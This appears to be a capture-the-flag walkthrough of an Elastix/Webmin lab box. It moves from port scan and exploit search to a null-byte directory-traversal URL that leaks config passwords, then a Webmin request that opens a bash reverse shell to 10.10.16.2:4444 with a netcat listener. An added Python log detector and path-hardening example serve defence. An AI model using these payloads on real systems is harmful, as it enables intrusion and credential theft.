Rough outline
- Nmap
- Search exploit
- Directory Traversal
- Reverse Shell
Nmap
22/tcp     ssh        4.3
25/tcp     smtp
80/tcp     http       2.2.3
110/tcp    pop3       2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111/tcp    rpcbind    #100000)
143/tcp    imap       2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
443/tcp    ssl/http   2.2.3
878/tcp    status     #100024)
993/tcp    ssl/imap
995/tcp    pop3
3306/tcp   mysql
4190/tcp   sieve      2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
4445/tcp   upnotifyp?
4559/tcp   HylaFAX    4.3.10
5038/tcp   Asterisk Call Manager 1.1
10000/tcp  http       MiniServ 1.570 (Webmin httpd)
▼Web application on each port
- https://10.10.10.7/ Elastix
- https://10.10.10.7:10000/ webmin
Search Sploit
- Elastix
Elastix - 'page' Cross-Site Scripting                  | php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulne          | php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting          | php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclus          | php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection                      | php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection                     | php/webapps/38091.php
https://10.10.10.7/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../../../../../etc/elastix.conf%00
▼Result
mysqlrootpwd=jEhdIekWmdjE
cyrususerpwd=jEhdIekWmdjE
amiadminpwd=jEhdIekWmdjE
- Log in to Webmin with this password and run the following payload
https://10.10.10.7:10000/file/show.cgi/bin/aaabbbcccc%7C/bin/bash%20i%20%3E&%20/dev/tcp/10.10.16.2/4444%200%3E&1%7C
Have a listener on port 4444 ready while doing this
# nc -lnvp 4444
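The two requests used above (the null-byte-terminated traversal in the `lang_crm` parameter, and the pipe-delimited shell command in the Webmin `file/show.cgi` path) are also what a defender would want to alert on. The following is an added example, not part of the original write-up: a small Python detector that classifies request targets from access-log lines and flags traversal, null bytes, shell metacharacters and a `/dev/tcp/` reverse-shell target, plus a hardened resolver for a language-include parameter that shows the mitigation (allowlist the value, then verify the resolved path stays inside the language directory). The log lines, the function names (`classify_request`, `scan_log`, `resolve_language_file`) and the `base_dir` layout are all constructed for this example.

```python
"""Added example: detect the request patterns from the walkthrough in web
access logs, and show a hardened language-include resolver.
All log lines and function names here are constructed for illustration."""
import os
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed sample access-log lines (Apache-style, trimmed). Lines 2 and 3
# reuse the request targets quoted in the write-up; lines 1 and 4 are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /vtigercrm/phprint.php?action=fa&module=ff&lang_crm=en_us HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../../../../../etc/elastix.conf%00 HTTP/1.1" 200 2048
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /file/show.cgi/bin/aaabbbcccc%7C/bin/bash%20i%20%3E&%20/dev/tcp/10.10.16.2/4444%200%3E&1%7C HTTP/1.1" 200 0
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php HTTP/1.1" 200 100
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# ".." as a whole path segment, with either slash style
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')
# characters that let a value break out of a single shell argument
SHELL_META_RE = re.compile(r'[|;`]|\$\(')


def decode_fully(s, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads (%252e) are seen."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify_request(target):
    """Return an ordered list of indicators found in one request target."""
    findings = []
    parts = urlsplit(target)
    path = decode_fully(parts.path)
    # parse_qsl already percent-decodes once; decode again for nested encoding
    values = [decode_fully(v) for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    for piece in [path, *values]:
        if TRAVERSAL_RE.search(piece):
            findings.append("path_traversal")
        if "\x00" in piece:          # null-byte truncation of a file suffix
            findings.append("null_byte")
    if SHELL_META_RE.search(path):   # command separators inside the URL path
        findings.append("shell_metachar_in_path")
    if "/dev/tcp/" in path:          # bash network redirection target
        findings.append("reverse_shell_target")
    return list(dict.fromkeys(findings))  # de-duplicate, keep first-seen order


def scan_log(text):
    """Yield (target, findings) for every log line that carries an indicator."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        findings = classify_request(m.group("target"))
        if findings:
            hits.append((m.group("target"), findings))
    return hits


# Mitigation side: how a language-include parameter should be handled.
LANG_RE = re.compile(r'^[a-z]{2}_[a-z]{2}$')   # e.g. en_us


def resolve_language_file(lang, base_dir):
    """Allowlist the language code, then confirm the resolved file stays
    under base_dir. Raises ValueError on any rejection."""
    if not LANG_RE.fullmatch(lang):
        raise ValueError("language code not in allowed format")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, f"{lang}.lang.php"))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("resolved path escapes the language directory")
    return candidate


if __name__ == "__main__":
    for target, findings in scan_log(SAMPLE_LOG):
        print(f"{', '.join(findings):45s} {target}")
```

The allowlist check alone already rejects both `../` and a `%00`-terminated value; the `commonpath` test is defense in depth for the case where the allowlist is later loosened.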